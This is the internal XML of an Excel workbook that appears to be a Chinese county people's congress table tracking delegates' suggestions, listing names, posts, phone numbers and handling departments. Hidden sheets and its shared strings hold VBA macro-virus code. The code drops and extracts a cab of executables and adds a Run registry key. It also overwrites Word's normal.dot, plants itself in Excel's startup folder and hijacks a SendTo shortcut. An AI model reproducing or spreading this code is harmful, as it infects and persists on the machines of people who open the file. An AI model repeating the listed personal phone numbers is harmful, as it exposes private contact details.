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MSKVCOOMLSPFQQ" sheetId="1" state="hidden" r:id="rId2"/>
    <sheet name="Module1" sheetId="2" state="hidden" r:id="rId3"/>
    <sheet name="Sheet1" sheetId="3" state="visible" r:id="rId4"/>
    <sheet name="Sheet2" sheetId="4" state="visible" r:id="rId5"/>
    <sheet name="Sheet3" sheetId="5" state="visible" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName function="false" hidden="true" localSheetId="2" name="_xlnm._FilterDatabase" vbProcedure="false">Sheet1!$A$3:$L$201</definedName>
    <definedName function="false" hidden="false" localSheetId="2"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1" uniqueCount="656">
  <si>
    <t xml:space="preserve">Private Sub createcabfile()</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fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">Next</t>
  </si>
  <si>
    <t xml:space="preserve">If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t xml:space="preserve">goto a1</t>
  </si>
  <si>
    <t xml:space="preserve">cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t xml:space="preserve">fso.delete cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">n=1</t>
  </si>
  <si>
    <t xml:space="preserve">m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">loop</t>
  </si>
  <si>
    <t xml:space="preserve">close #1</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">word.quit</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\norma1.xlm", Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) &amp; "\"</t>
  </si>
  <si>
    <t xml:space="preserve">set fold=fso.getfolder(w.SpecialFolders("SendTo"))</t>
  </si>
  <si>
    <t xml:space="preserve">for each ff in fold.files</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">")&gt;0 then</t>
    </r>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r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">end if</t>
  </si>
  <si>
    <t xml:space="preserve">next</t>
  </si>
  <si>
    <t xml:space="preserve">e2:</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">W</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">orkbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">thisworkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy workbooks("norma1.xlm").sheets("(m1)_(m2)_(m3)").Columns(2)</t>
  </si>
  <si>
    <t xml:space="preserve">workbooks("norma1.xlm").save</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">a1:</t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">for i=1 to thisworkbook.sheets.count</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ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t xml:space="preserve">ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t xml:space="preserve">End Sub</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">附件</t>
    </r>
    <r>
      <rPr>
        <sz val="14"/>
        <color rgb="FF000000"/>
        <rFont val="方正黑体_GBK"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="20"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">县第十八届人大五次会议代表建议办理情况统计表（截至</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color rgb="FF000000"/>
        <rFont val="方正小标宋_GBK"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">7</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">月</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color rgb="FF000000"/>
        <rFont val="方正小标宋_GBK"/>
        <family val="0"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">31</t>
    </r>
    <r>
      <rPr>
        <sz val="20"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">日）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">序号</t>
  </si>
  <si>
    <t xml:space="preserve">提议人</t>
  </si>
  <si>
    <t xml:space="preserve">单位及职务</t>
  </si>
  <si>
    <t xml:space="preserve">议案或建议名称</t>
  </si>
  <si>
    <t xml:space="preserve">涉及类别</t>
  </si>
  <si>
    <t xml:space="preserve">联系电话</t>
  </si>
  <si>
    <t xml:space="preserve">承办单位</t>
  </si>
  <si>
    <t xml:space="preserve">协办单位</t>
  </si>
  <si>
    <t xml:space="preserve">是否重点督办建议</t>
  </si>
  <si>
    <t xml:space="preserve">督办
领导</t>
  </si>
  <si>
    <t xml:space="preserve">是否办结回复</t>
  </si>
  <si>
    <t xml:space="preserve">办理效果</t>
  </si>
  <si>
    <t xml:space="preserve">齐   琼</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道梁峰村支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决红星社区花院组安置房居民饮水无保障的建议</t>
  </si>
  <si>
    <t xml:space="preserve">农业农村</t>
  </si>
  <si>
    <t xml:space="preserve">县城市管理局</t>
  </si>
  <si>
    <t xml:space="preserve">齐    琼</t>
  </si>
  <si>
    <t xml:space="preserve">关于红星社区申请花院、寨坡两组安装分户水表的建议</t>
  </si>
  <si>
    <t xml:space="preserve">其他</t>
  </si>
  <si>
    <t xml:space="preserve"> 关于提高村组干部待遇的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县委组织部</t>
  </si>
  <si>
    <t xml:space="preserve">是</t>
  </si>
  <si>
    <t xml:space="preserve">A</t>
  </si>
  <si>
    <t xml:space="preserve">关于做好回龙中学至万寿山景区沿途规划的建议</t>
  </si>
  <si>
    <t xml:space="preserve">城建环保</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道、县规划自然资源局、县农业农村委、县城市管理局</t>
  </si>
  <si>
    <t xml:space="preserve">李燕明</t>
  </si>
  <si>
    <t xml:space="preserve">马建国</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道红星社区居民</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 关于红星社区增设公交车站台及开通</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">202</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">班次解决群众出行难的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">县交通局</t>
  </si>
  <si>
    <t xml:space="preserve">县规划自然资源局、县城市管理局</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决红星社区征地拆迁房屋产权证迟迟未办理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县规划自然资源局</t>
  </si>
  <si>
    <t xml:space="preserve">县征拆中心、南宾街道</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决渝东批发市场回购农具房的水户口费用的建议</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道、县供水公司</t>
  </si>
  <si>
    <t xml:space="preserve">谭学祥</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道红井社
区综合治理专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于开通县城至南宾街道城北村公共交通的建议</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道红井社区
综合治理专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于修建华夏小学至花漫里小区人行便道的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县住房城乡建委</t>
  </si>
  <si>
    <t xml:space="preserve">县城市管理局、县水利局、南宾街道</t>
  </si>
  <si>
    <t xml:space="preserve">关于修建南宾街道红井社区红井桥的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县城市管理局、县水利局</t>
  </si>
  <si>
    <t xml:space="preserve">秦锦权</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道城东社区支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于在南宾街道城东社区干溪子小区旁修建一个农贸市场的建议
</t>
  </si>
  <si>
    <t xml:space="preserve">县商务委</t>
  </si>
  <si>
    <t xml:space="preserve"> 关于要求及时解决养老服务站服务人员经费的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县民政局</t>
  </si>
  <si>
    <t xml:space="preserve">县财政局</t>
  </si>
  <si>
    <t xml:space="preserve">袁明权</t>
  </si>
  <si>
    <t xml:space="preserve">万安街道华丰社区党支部书记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于恢复华丰社区瑞通路</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">607</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">路公交车的建议 </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">万安街道</t>
  </si>
  <si>
    <t xml:space="preserve">关于将万安街道华丰社区（原乡政府至马仗坡）沿线居民供水纳入市政供水管理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">刘   明</t>
  </si>
  <si>
    <t xml:space="preserve">重庆舒义律师事务所所长</t>
  </si>
  <si>
    <t xml:space="preserve"> 关于加快推行建设工程总承包的建议  </t>
  </si>
  <si>
    <t xml:space="preserve">县发展改革委</t>
  </si>
  <si>
    <t xml:space="preserve">冉龙林</t>
  </si>
  <si>
    <t xml:space="preserve">万安街道城南社区党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于提高社区居民小组长待遇的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">陈    勇</t>
  </si>
  <si>
    <t xml:space="preserve">华丰小学教务处主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于乡村振兴的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">县乡村振兴局</t>
  </si>
  <si>
    <t xml:space="preserve">县农业农村委、县林业局、县交通局、县文化旅游委</t>
  </si>
  <si>
    <t xml:space="preserve">杨    勇</t>
  </si>
  <si>
    <t xml:space="preserve">麦斯特精密机械有限公司经理</t>
  </si>
  <si>
    <t xml:space="preserve">关于做好石柱农村电商与乡村振兴融合发展及政策扶持的建议                                </t>
  </si>
  <si>
    <t xml:space="preserve">财政经济</t>
  </si>
  <si>
    <t xml:space="preserve">县农业农村委</t>
  </si>
  <si>
    <t xml:space="preserve">蹇泽西</t>
  </si>
  <si>
    <t xml:space="preserve">马保泽</t>
  </si>
  <si>
    <t xml:space="preserve">石柱县市场监管局科长</t>
  </si>
  <si>
    <t xml:space="preserve">关于当前我县新型冠状病毒肺炎疫情防控的几点建议</t>
  </si>
  <si>
    <t xml:space="preserve">教科文卫</t>
  </si>
  <si>
    <t xml:space="preserve">县卫生健康委</t>
  </si>
  <si>
    <t xml:space="preserve">县委政法委、县商务委、县市场监管局</t>
  </si>
  <si>
    <t xml:space="preserve">谭木云</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道勇飞村支部书记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于要求及时解决</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">2020</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">年农村公路养护资金的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">田    波</t>
  </si>
  <si>
    <t xml:space="preserve">南宾街道城北社区支部书记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于恢复城北</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">202</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">路公交车的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">关于安装南宾街道城北社区大坝组学堂坝至柿子坪路灯的建议</t>
  </si>
  <si>
    <t xml:space="preserve">D</t>
  </si>
  <si>
    <t xml:space="preserve">关于撤销人民街及玉带河南街所有停车位，将玉带河南街改造为四车道的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决村社区干部任职多年，但未缴足养老保险补缴的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县人力社保局</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决城北社区大坝组自来水供水严重不足的建议</t>
  </si>
  <si>
    <t xml:space="preserve">李云胜</t>
  </si>
  <si>
    <t xml:space="preserve">县发改委副主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大县城机动车辆逆向行驶整治力度的建议      </t>
  </si>
  <si>
    <t xml:space="preserve">县公安局</t>
  </si>
  <si>
    <t xml:space="preserve">谭红建
任光玉
谭明忠</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇沿江社区支书
西沱镇云梯社区支书
西沱镇月台社区支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快实施巴盐古道独门嘴至楠木垭体验路段康养项目的建议</t>
  </si>
  <si>
    <t xml:space="preserve">13648280118
13452282092
13709493185</t>
  </si>
  <si>
    <t xml:space="preserve">县农旅集团、县库心办、西沱镇</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快实施独门嘴水上游乐项目的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县库心办</t>
  </si>
  <si>
    <t xml:space="preserve">县农旅集团</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快实施西沱古镇四星级以上旅游接待酒店项目建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、县农旅集团</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快实施西沱古镇新云梯街造血功能项目建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县文化旅游委、县农旅集团、西沱镇</t>
  </si>
  <si>
    <t xml:space="preserve">汪琼梅</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇和宜社区综合服务专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快水磨溪湿地公园打造的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县林业局</t>
  </si>
  <si>
    <t xml:space="preserve">C</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快西沱镇和宜社区办公楼项目建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇</t>
  </si>
  <si>
    <t xml:space="preserve">陈启凤</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇双桥社区支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快推进石柱县人民医院西沱分院建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快推进西沱镇江家槽码头建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快推进西沱镇移民及三村十二组“两证”遗留处理的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县水利局</t>
  </si>
  <si>
    <t xml:space="preserve">任光玉</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇云梯社区支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快西沱镇绕镇路建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">谭明忠</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇月台社区支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于加强西沱镇市政管理及基础设施建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">谭红燕</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇山平村支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于将西沱片区万亩产业纳入乡村振兴示范片的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于湿地保护区域完善基础设施建设需作政策调整的建议</t>
  </si>
  <si>
    <t xml:space="preserve">谭红建</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇沿江社区支书</t>
  </si>
  <si>
    <t xml:space="preserve">关于将西沱镇陶家（原生化厂）闲置厂房划归沿江社区管理并发展集体经济产业项目的建议</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于解决西沱镇衙门路</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">108</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">号锦江华府烂尾楼的建议</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">谭明忠 任光玉 谭红建 陈启凤 谭红燕 汪群梅</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇月台社区支书 
西沱镇云梯社区支书       
西沱镇沿江社区支书     
西沱镇双桥社区支书      
西沱镇山平村支书      
西沱镇和宜社区综合服务专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于经济发达强镇试点改革人权、事权、财权匹配的建议 </t>
  </si>
  <si>
    <t xml:space="preserve">13709493185 13452282092 13648280118 15923755248 13452216756 18723997017 </t>
  </si>
  <si>
    <t xml:space="preserve">县委编办</t>
  </si>
  <si>
    <t xml:space="preserve">县财政局、县委组织部、县人力社保局</t>
  </si>
  <si>
    <t xml:space="preserve">朱永坤</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇农业服务中心干部</t>
  </si>
  <si>
    <t xml:space="preserve">关于在西沱镇增设生猪定点屠宰场的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县市场监管局、县生态环境局、西沱镇</t>
  </si>
  <si>
    <t xml:space="preserve">刘光明</t>
  </si>
  <si>
    <t xml:space="preserve">西沱中学副校长</t>
  </si>
  <si>
    <t xml:space="preserve">关于增加高中学校财政经费投入的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县教委</t>
  </si>
  <si>
    <t xml:space="preserve">胡利凡</t>
  </si>
  <si>
    <t xml:space="preserve">西沱教育督导区成员</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快西沱镇公立幼儿园建设手续审批进度的建议</t>
  </si>
  <si>
    <t xml:space="preserve">冉青松</t>
  </si>
  <si>
    <t xml:space="preserve">西沱镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于将水磨溪自然保护区管护资金纳入县级财政预算和增加西沱镇场镇管理资金的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县林业局、西沱镇</t>
  </si>
  <si>
    <t xml:space="preserve">谢世明</t>
  </si>
  <si>
    <t xml:space="preserve">万朝镇党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于消除万朝镇境内煤矿矿渣堆积体安全隐患的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县应急管理局</t>
  </si>
  <si>
    <t xml:space="preserve">汪小铃</t>
  </si>
  <si>
    <t xml:space="preserve">万朝镇万富村综合服务专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于实施万朝镇河堤项目建设的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于硬化万朝镇各自然村生产公路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大投入完善场镇污水管网处理设施的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于规范整治万朝镇场镇风貌的建议</t>
  </si>
  <si>
    <t xml:space="preserve">万朝镇</t>
  </si>
  <si>
    <t xml:space="preserve">李朝荣</t>
  </si>
  <si>
    <t xml:space="preserve">石柱县西南大学县校合作办
项目科科长</t>
  </si>
  <si>
    <t xml:space="preserve">关于切实加强中小学生党史国史教育的建议</t>
  </si>
  <si>
    <t xml:space="preserve">秦荣华</t>
  </si>
  <si>
    <t xml:space="preserve">刘万年</t>
  </si>
  <si>
    <t xml:space="preserve">万朝镇万富村支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于硬化已关闭煤矿余留公路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于硬化周家坝至沙坪公路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于尽快修建磨子至火石岭快速通道的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于硬化主公路两侧支路至入户路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于千野草场占用万富村林地补偿问题的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县农旅集团、县林业局</t>
  </si>
  <si>
    <t xml:space="preserve">江  策</t>
  </si>
  <si>
    <t xml:space="preserve">王场镇人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于实事求是确认林地的建议</t>
  </si>
  <si>
    <t xml:space="preserve">王  军</t>
  </si>
  <si>
    <t xml:space="preserve">王场镇太和社区主任</t>
  </si>
  <si>
    <t xml:space="preserve">关于建立产销联结机制解决深调产业发展后顾之忧的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县农业农村委、县投资促进中心、县经济信息委</t>
  </si>
  <si>
    <t xml:space="preserve">袁  静</t>
  </si>
  <si>
    <t xml:space="preserve">黎场小学校长</t>
  </si>
  <si>
    <t xml:space="preserve">关于破解农村教师超编问题，激发教师积极性的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县教委、县委编办</t>
  </si>
  <si>
    <t xml:space="preserve">黎学兰</t>
  </si>
  <si>
    <t xml:space="preserve">黎场乡秀才村综合服务专干</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大公路养护费投入的建议</t>
  </si>
  <si>
    <t xml:space="preserve">黎华勇</t>
  </si>
  <si>
    <t xml:space="preserve">黎场乡黎场村党支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于加大基层前端保洁费投入的建议</t>
  </si>
  <si>
    <t xml:space="preserve">周亚斌</t>
  </si>
  <si>
    <t xml:space="preserve">黎场乡人大主席</t>
  </si>
  <si>
    <t xml:space="preserve">关于加快农村电网升级改造的建议</t>
  </si>
  <si>
    <t xml:space="preserve">县供电公司</t>
  </si>
  <si>
    <t xml:space="preserve">关于黎场乡建制黎场镇的建议</t>
  </si>
  <si>
    <t xml:space="preserve">付光福</t>
  </si>
  <si>
    <t xml:space="preserve">黎场乡党委书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于建立黎场乡辖区派出所的建议</t>
  </si>
  <si>
    <t xml:space="preserve">内务司法</t>
  </si>
  <si>
    <t xml:space="preserve">罗小平</t>
  </si>
  <si>
    <t xml:space="preserve">沿溪镇新阳村支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于新建沿溪镇新阳村至忠县复兴镇连接路的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于改良三峡库区原绿化栽植花椒树品种的建议</t>
  </si>
  <si>
    <t xml:space="preserve">关于开发三峡库区尾水河道旅游景观的建议</t>
  </si>
  <si>
    <t xml:space="preserve">崔学明</t>
  </si>
  <si>
    <t xml:space="preserve">沿溪镇清溪村支部书记</t>
  </si>
  <si>
    <t xml:space="preserve">关于解决退耕还林后农民生活保障问题的建议</t>
  </si>
  <si>
    <t xml:space="preserve">向剑华</t>
  </si>
  <si>
    <t xml:space="preserve">黄水镇党委书记</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">关于将省道</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">516</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Noto Sans"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">线起点改至黄水镇清河村临湖北利川建南的建议</t>
    </r>
  </si>
  <si>
